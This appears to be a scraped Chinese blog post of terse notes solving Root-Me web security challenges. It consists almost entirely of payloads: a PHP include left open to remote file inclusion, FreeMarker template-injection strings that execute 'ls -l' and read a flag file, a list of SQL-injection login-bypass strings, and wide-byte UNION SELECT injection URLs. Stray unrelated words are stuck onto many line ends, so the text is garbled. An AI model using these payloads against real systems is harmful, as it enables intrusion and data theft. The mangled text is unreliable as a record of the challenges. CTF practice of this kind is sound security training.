Get the PHP source code.php
ctrl+uhtml
進行RFI攻擊須要同時具有三個條件(被攻擊機器):web
allow_url_fopen = On (默認開啓)sql
allow_url_include = On (默認關閉)服務器
被包含的變量前沒有目錄的限制ide
<?php
$filename = $_GET['file']; //將參數file的值傳送給變量filename
include($filename); //使用include()函數包含變量
?>函數
Java EE.net
Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.code
對輸入過濾不嚴格
${2*3}
說明執行了
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("ls -l") }
找目錄SECRET_FLAG.txt
查看選中部分源碼
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("cat ../SECRET_FLAG.txt") }
Retrieve the administrator password
ctrl+u
使用萬能密鑰
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
密碼123456
ctrl+u
type="password" value="t0_W34k!$"
寬字節注入
http://challenge01.root-me.org/web-serveur/ch42/index.php?id=1%bf%5c%27
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%bf%5c'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),2,3,4,5,6,7,8)%23
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),version(),3,4,5,6,7,8)%23
Retrieve the administrator password
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1
正常
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1'
報錯
𖠂’ OR 1=1 /*
SELECT * FROM test WHERE name = '𖠂’ OR 1=1 /*’ LIMIT 1
歡迎訪問個人獨立博客:joy_nick